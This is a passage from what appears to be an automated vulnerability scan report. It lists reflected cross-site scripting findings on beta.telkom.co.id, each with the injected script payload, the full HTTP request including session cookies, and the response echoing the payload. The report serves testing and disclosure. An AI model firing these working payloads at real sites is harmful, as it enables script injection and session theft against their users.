2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1308922027%2E341%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:32:15 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction3a324<script>alert(1)</script>ae0e732eb9f("");
4.22. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a5c"><script>alert(1)</script>c7f881fbc98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investord3a5c"><script>alert(1)</script>c7f881fbc98/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:43 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23899
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investord3a5c"><script>alert(1)</script>c7f881fbc98/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...
4.23. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7349a<script>alert(1)</script>1dabfe6b8e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investor7349a<script>alert(1)</script>1dabfe6b8e6/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:48 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23893
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/hubungan-investor7349a<script>alert(1)</script>1dabfe6b8e6/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html</b>
...[SNIP]...
4.24. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9360a--><script>alert(1)</script>951e05938fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /hubungan-investor9360a--><script>alert(1)</script>951e05938fc/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:57 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23902
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investor9360a--><script>alert(1)</script>951e05938fc/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...
4.25. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f56a1--><script>alert(1)</script>3a5776513bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /hubungan-investor/siaran-persf56a1--><script>alert(1)</script>3a5776513bf/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:35 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23902
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investor/siaran-persf56a1--><script>alert(1)</script>3a5776513bf/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...
4.26. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e46c<script>alert(1)</script>f7a1aef4314 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investor/siaran-pers7e46c<script>alert(1)</script>f7a1aef4314/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:24 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23893
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/hubungan-investor/siaran-pers7e46c<script>alert(1)</script>f7a1aef4314/undangan-acara-investor-company-site-visit-di-manado.html</b>
...[SNIP]...
4.27. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 617e2"><script>alert(1)</script>ed966d48c0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investor/siaran-pers617e2"><script>alert(1)</script>ed966d48c0c/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:19 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23899
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investor/siaran-pers617e2"><script>alert(1)</script>ed966d48c0c/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...
4.28. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65705<script>alert(1)</script>c8c75b10326 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info-perusahaan65705<script>alert(1)</script>c8c75b10326/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:24:51 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23710
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/info-perusahaan65705<script>alert(1)</script>c8c75b10326/index.html</b>
...[SNIP]...
4.29. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 17160--><script>alert(1)</script>6ef070357e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /info-perusahaan17160--><script>alert(1)</script>6ef070357e7/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:24:57 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23719
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/info-perusahaan17160--><script>alert(1)</script>6ef070357e7/index.html?&lid=en">
...[SNIP]...
4.30. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0cb4"><script>alert(1)</script>252f949c3a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info-perusahaana0cb4"><script>alert(1)</script>252f949c3a2/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:24:47 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23716
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/info-perusahaana0cb4"><script>alert(1)</script>252f949c3a2/index.html?&lid=en">
...[SNIP]...
4.31. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2384c--><script>alert(1)</script>ac061dfca82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media2384c--><script>alert(1)</script>ac061dfca82/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:09 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23360
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media2384c--><script>alert(1)</script>ac061dfca82/artikel-infokom/index.html?&lid=id" class="blue">
...[SNIP]...
4.32. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbff7"><script>alert(1)</script>ae3c0457ac0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediacbff7"><script>alert(1)</script>ae3c0457ac0/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:59 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23752
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediacbff7"><script>alert(1)</script>ae3c0457ac0/artikel-infokom/index.html?&lid=en">
...[SNIP]...
4.33. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4080<script>alert(1)</script>71eea796522 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediaf4080<script>alert(1)</script>71eea796522/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
